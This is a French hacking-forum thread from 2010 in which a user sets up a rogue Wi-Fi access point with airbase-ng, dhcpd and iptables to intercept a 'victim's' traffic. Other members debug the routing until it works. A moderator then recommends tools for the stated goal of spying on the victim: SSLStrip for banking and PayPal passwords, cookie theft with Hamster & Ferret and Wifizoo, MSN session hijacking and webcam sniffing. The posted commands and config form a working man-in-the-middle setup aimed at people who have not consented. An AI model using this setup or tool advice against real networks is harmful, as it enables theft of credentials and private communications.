Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-03-2010 16:50:27

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

A l'aide : Reroutage des ip impossible !!!!!!

Salut à tous,

Voila je suis en train de créer un rogue AP c'est plutot bien parti mais je suis bloqué au reroutage!

:: Voici le tuto que je suis pour backtrack 4 ::
http://www.backtrack-linux.org/forums/b … ffing.html

:: Voici ma configuration ::
Interface internet : eth0
Adresse IP attribuée (par DHCP) par ma freebox : 192.168.0.11
Adresse IP de la freebox : 192.168.0.254
Interface Wifi pour la rogue : wlan0 qui se transforme en mon0

:: Le problème ::
La victime voit bien la rogue, elle s'y connecte, une IP lui est bien attribuée, tout semble bien fonctionner.
Voici ce qui apparait dans ipconfig /all sous le windows de la victime :
Carte Ethernet Connexion réseau sans fil :
        Suffixe DNS propre à la connexion  :
        Description . . . . . . . . . . .  : 802.11n Wireless Card
        Adresse physique . . . . . . . . . : 00-15-AF-12-14-EA
        DHCP activé. . . . . . . . . . .   : Oui
        Configuration automatique activée  : Oui
        Adresse IP. . . . . . . . . . . .  : 192.168.2.130
        Masque de sous-réseau . . . . . .  : 255.255.255.128
        Passerelle par défaut . . . . . .  : 192.168.2.129
        Serveur DHCP. . . . . . . . . . .  : 192.168.2.129
        Serveurs DNS . . . . . . . . . .   : 212.27.40.240
        Bail obtenu . . . . . . . . . . .  : vendredi 5 mars 2010 16:35:27
        Bail expirant . . . . . . . . . .  : lundi 15 mars 2010 16:35:27

-> Mais quand je vais sur le net avec le PC de la victime, impossible de charger la page.

:: Les commandes que j'ai executé ::

dhclient eth0
airmon-ng start wlan0

Mon fichier dhcpd.conf :

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 212.27.40.240;
range 192.168.2.130 192.168.2.140;
}

airbase-ng -e "wifree" mon0

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
echo > '/var/lib/dhcp3/dhcpd.leases'
dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.254
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000


-> Quelqu'un aurait trouvé une coquille ou un truc qui manque ??

Merci!!!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-03-2010 19:02:17

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : A l'aide : Reroutage des ip impossible !!!!!!

Ton topic n'ayant rien à voir avec le crack WPA, je le déplace dans une autre section du forum. Merci de créer tes sujets dans les sections appropriées.

Hors Ligne

#3 05-03-2010 19:15:47

Oxley
Membre Hyperactif
Inscription : 02-09-2009
Messages : 49

Re : A l'aide : Reroutage des ip impossible !!!!!!

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -o eth0 -j MASQUERADE

Essayes ça smile

Hors Ligne

#4 05-03-2010 22:43:25

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

Re : A l'aide : Reroutage des ip impossible !!!!!!

oops pardon pour le plantage de section wink

Bon alors.....

Déja un petit echo 1 > /proc/sys/net/ipv4/ip_forward a pu accelerer les choses.

Ensuite oxley pour ceci :
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -o eth0 -j MASQUERADE

et bien il y a une erreur a cause du -o visiblement non compatible avec PREROUTING.
alors j'ai remplacé par POSTROUTING.

avec le ip_forward à 1 ........ ca marche !!!!!!

par contre pour le code d'origine meme avec le ip_forward à 1 ca ne fonctionne pas!

etape suivante, avec ton code et le ipforward a 1 j'ai ensuite lancé ettercap avec ceci : ettercap -T -q -p -i at0 // //

le programme charge bien mais du coup, le victime ne peut plus surfer, meme probleme qu'avant !!
avec ettercap qui tourne en faisant un cat /proc/sys/net/ipv4/ip_forward je remarque qu'il est repassé à 0 et impossible de le changer pendant que le programme tourne, il reste à 0, je sais pas c'est peut etre une piste ???

Pouvez vous m'aider ????
Je touche bientot au but!!!!!!!!!

Sinon dernier pb, mon fake ap est visible, mais des fois il disparait, savez vous d'ou peut provenir le pb ??

Hors Ligne

#5 05-03-2010 22:55:13

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : A l'aide : Reroutage des ip impossible !!!!!!

Pourquoi tu veux lancer ettercap, exactement ? hmm Dans le cas d'un Rogue AP, tu es (par définition) déjà en MITM, donc normalement tu n'en as plus besoin. Si tu l'utilises juste pour ses plugins, normalement il y a moyen de faire ca avec d'autres programmes "indépendants".
Quoi qu'il en soit, tant que [c]ip_forward[/c] est à 0, c'est mort, le transfert de connexion est interdit et donc ta victime ne pourra pas surfer. C'est probablement Ettercap qui est responsable, au passage est-ce que tu as pensé à décommenter la section iptables (comme indiqué ici --> Ettercap issues ssl and poisoning [Ubuntu forums], 4ème message) dans [c]etter.conf[/c] ? smile

Pour la "disparition" de l'AP, j'aimerais d'abord des précisions sur ce que tu appelles "disparaître" : comment tu le vois, combien de temps il disparaît,... Le seul moyen un peu sérieux de vérifier ca, c'est de lancer Airodump (calé sur le bon canal) et regarder si tu chopes tous les Beacons wink

Hors Ligne

#6 05-03-2010 23:04:39

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

Re : A l'aide : Reroutage des ip impossible !!!!!!

Alors,

En fait je voudrais lancer ettercap afin d'espionner ce que fait la victime, je ne m'y connais pas tellement je découvre un peu alors peut etre que comme tu le dis, il y a des logiciels plus appropriés pour ce genre de choses (j'ai vu dans un tuto un qui servait a espionner les conversions msn, un pour decrypter les images qui transitent etC..) alors effectivement si tu pouvais me conseiller ce serait cool car au niveau sniffing je suppose qu'il y a plein de programmes tous plus complexes les uns que les autres wink

Ensuite, oui j'avais effectivement décommenté les 2 lignes paragraphe "linux" puis iptables

Pour la disparition de l'AP en fait elle est constamment présente mais des fois l'essid apparait bien en clair, et d'autres fois il est <hidden> (dans wicd) et donc quand il est hidden il n'est plus du tout présent dans le gestionnaire de connexion wifi de la victime, alors que des fois il apparait...

Hors Ligne

#7 05-03-2010 23:23:55

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : A l'aide : Reroutage des ip impossible !!!!!!

Bon, pour la disparition alors je n'en sais rien hmm Le problème est assurément lié à Airbase, mais je ne le connais pas assez pour t'en dire plus... Mais même si le SSID devient "caché", tanr qu'il reste le même ta victime Windows pourra s'y connecter (tant qu'il est dans ses réseaux favoris).

Pour le coup du sniffing, je confirme qu'il y a plein de logiciels qui fonctionnement mieux qu'Ettercap. Par exemple, tu as toute la suite Dsniff (dsniff, urlsnarf, driftnet, msgsnarf, webspy si tu arrives à le faire marcher mais je doute...). Ensuite, tu as aussi SSLStrip, pour décoder les mots de passe des sites dits "sécurisés" (mail, ebay, paypal,  banque,...). Tu peux aussi te contenter de faire du méchant vol de cookies, pour accéder aux sites (Facebook,...) sans connaître le mot de passe, je pense alors à Hamster & Ferret (bien que je préfère Wifizoo, voir ci-dessous).
Si tu t'intéresses plutôt à MSN (et que msgsnarf foire, ce qui ne me surprendrait pas) tu as le très joli MSNShadow qui marche pas mal : sniff des messages, sniff des vidéos webcam, hijack de session (tu t'incrustes dans une discussion),... Le seul problème c'est qu'il est un peu pénible à installer sous BackTrack (il y a un post à ce sujet pour BT3, mais je n'ai pas vérifié s'il est toujours d'actualité)

Tu peux aussi utiliser tcpdump pour capturer TOUT le trafic qui passe sur ton interface at0, pour le sauvegarder dans un fichier .pcap pour analyse ultérieure. Comme ca tu pourras utiliser Wireshark (très complet, mais un peu rebutant), Xplico (très pratique, voir le tuto de [email protected]),  ou encore Wifizoo en mode "pcap", pour en extraire les cookies comme je te l'ai dit.

En fait, la vraie question c'est de savoir ce que tu veux sniffer, parce que les outils, tu vois qu'ils existent smile J'ai volontairement évité de te mettre des liens directs, il est temps que tu te fasses ta petite recherche peinard wink

Si tu veux parler plus en détail de ces outils, on le fera dans un autre topic parce que ce n'est pas le sujet ici smile Regarde juste si tu arrives à assurer le "reroutage des IP" sans Ettercap, et on pourra considérer le problème comme résolu wink

Hors Ligne

#8 06-03-2010 00:00:40

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

Re : A l'aide : Reroutage des ip impossible !!!!!!

Et bien c'est good alors probleme résolu wink
Le trafic fonctionne parfaitement en transparence !

Je vais maintenant m'attaquer au sniff je vais faire des recherches sur les outils que tu viens de me donner et je reposterai surement d'ici peu big_smile

merci a toi en tout cas antares!!!

Hors Ligne

#9 06-03-2010 09:28:58

Oxley
Membre Hyperactif
Inscription : 02-09-2009
Messages : 49

Re : A l'aide : Reroutage des ip impossible !!!!!!

Pour l'essid j'ai le même problème que toi :p

Sur le pc victime je vois l'essid en carré  &#9604; &#9604; &#9604; &#9604; ....., alors soit c'est ma carte qui est moisi mais je pense pas les autres réseaux je les vois.

Et dans airodump je vois que ma rogue change de channel en permanence.

Bref, allez antares vient à mon aide smile

Hors Ligne

#10 06-03-2010 09:35:43

precomputed
Membre Actif
Inscription : 23-02-2010
Messages : 43

Re : A l'aide : Reroutage des ip impossible !!!!!!

C'est quoi ta commande airbase ?

Pour ma part : airbase-ng -P -C 30 -e "tralala" -v mon0

Hors Ligne

#11 06-03-2010 10:29:08

Oxley
Membre Hyperactif
Inscription : 02-09-2009
Messages : 49

Re : A l'aide : Reroutage des ip impossible !!!!!!

pareil sauf le -v mais j'ai regardé il faut rajouter le paramètre -c channel


PS: j'avais déjà ce paramètre mais ça change tout le temps quand même

Dernière modification par Oxley (06-03-2010 10:30:14)

Hors Ligne

#12 06-03-2010 11:20:38

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : A l'aide : Reroutage des ip impossible !!!!!!

Bon, de nouveau on s'écarte un  peu du sujet, là roll

Oxley a écrit :

Bref, allez antares vient à mon aide smile

Quand c'est demandé si gentiment... Je l'ai déjà dit et je le redis : je ne connais pas bien Airbase donc n'attends pas de miracle tongue

Par contre, j'ai été lire le manuel de Airbase ([c]man airbase-ng[/c]), et je voudrais savoir pourquoi vous utilisez les options "-P" et "-C" hmm Extraits choisis :

L'auteur du manuel a écrit :

-P     This  causes  the  fake  access  point  to respond to all probes
        regardless of the ESSIDs specified.
-C <seconds>
        The wildcard ESSIDs will also be beaconed this  number  of  seconds.
        A good typical value to use is "-C 60" (require -P).

Donc en gros, votre Rogue est configuré pour répondre à toutes les demandes de réseau, quel que soit le nom, et toutes les 30 secondes il émet un paquet comme quoi il est bien le réseau demandé (quel que soit son nom). Il suffit qu'un autre réseau se trouve sur un canal différent pour qu'Airbase ait envie de l'imiter lui aussi, et donc rien ne l'empêche de changer de canal...

En règle générale, quand une commande ne fonctionne pas comme prévu, commencez par vérifier le rôle et l'utilité de chacune des options wink Ici, essayez de lancer le rogue avec la commande suivante : [c]airbase-ng -e "tralala" -c 6 -v mon0[/c] (je viens de faire un essai avec wlan0, ca marche aussi, à vous de voir ce qui marche le mieux) smile

Hors Ligne

#13 06-03-2010 11:29:24

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : A l'aide : Reroutage des ip impossible !!!!!!

Est-ce que quelqu'un pourrait donner son dhcpd.conf svp


Sharkoff

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
7 322 23-11-2016 18:46:08 par koala
0 287 22-10-2016 19:03:48 par Antho3674
8 514 19-10-2016 14:43:06 par kcdtv
besoin d'aide par toudiani
10 313 13-10-2016 14:13:32 par toudiani
4 958 21-08-2016 19:50:06 par Seska

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]